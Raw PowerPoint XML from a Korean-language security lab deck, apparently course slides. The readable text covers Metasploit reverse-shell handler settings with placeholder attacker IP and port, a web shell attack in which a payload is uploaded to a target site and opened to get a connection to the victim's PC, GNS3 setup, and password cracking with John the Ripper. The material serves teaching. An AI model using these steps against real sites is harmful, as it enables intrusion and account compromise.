              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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 [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="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공격자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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IP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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# set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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 [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="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공격자 포트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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# exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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65746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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>번</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="그림 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB92BDEF-983D-440E-AC26-C482D721C7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72381" y="1968500"/>
            <a:ext cx="5913238" cy="4686300"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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상대방 사이트에 접속 후 페이로드 파일 업로드한다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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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업로드한 위치 디렉토리 사이트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/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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tmp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에 접속 후 업로드한 파일 클릭한다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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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WEBSHELL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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공격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95020AD9-93A3-4AD0-895A-EB325D61FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14A39AB9-2101-4708-BCF6-739E01B2F79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32" r="-632"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="1968501"/>
            <a:ext cx="5958930" cy="3962342"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1282514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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12A34401-599B-45B7-85F2-254DBEDFA9A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="241297"/>
            <a:ext cx="6349993" cy="9397999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="20000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="204E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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="사각형: 둥근 위쪽 모서리 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1898EFCF-EF1C-40AB-BA71-A382CFBBA3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2724152" y="-57143"/>
            <a:ext cx="2298698" cy="5460990"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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7" name="제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4B6E55-904B-464D-918A-13440A5DEE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3531" y="1996900"/>
            <a:ext cx="4933945" cy="1352903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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GNS3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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세팅</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="부제목 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F900AFB5-8FB4-429A-A1A5-D8BC883ECC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79568" y="4009144"/>
            <a:ext cx="4841870" cy="842224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/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800531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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>번</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 개체 틀 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD2EF1D-394B-4F44-805E-AEEAF645C2AF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6" t="1061" r="2183" b="-5319"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="2274531"/>
            <a:ext cx="5669339" cy="1459195"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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업로드한  파일을 클릭하면 피해자의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PC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에 연결된 것을 확인 가능하다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.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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WEBSHELL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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공격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95020AD9-93A3-4AD0-895A-EB325D61FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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그림 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06756CA8-2A58-4675-8F24-7958D20243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380" y="3759127"/>
            <a:ext cx="5715029" cy="1984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7724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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12A34401-599B-45B7-85F2-254DBEDFA9A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="241297"/>
            <a:ext cx="6349993" cy="9397999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="20000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="204E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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="사각형: 둥근 위쪽 모서리 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1898EFCF-EF1C-40AB-BA71-A382CFBBA3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2724152" y="-57143"/>
            <a:ext cx="2298698" cy="5460990"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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7" name="제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4B6E55-904B-464D-918A-13440A5DEE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3531" y="1996900"/>
            <a:ext cx="4933945" cy="1352903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Password</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="부제목 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F900AFB5-8FB4-429A-A1A5-D8BC883ECC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79568" y="4009144"/>
            <a:ext cx="4841870" cy="842224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/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288767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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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확인을 위해 기존에 있던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user1, user2, …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외에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test1, test2, …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유저도 만든다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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5AF2492A-61DA-4548-8885-9D106A28CE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63" y="3266681"/>
            <a:ext cx="6081437" cy="2020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1984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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
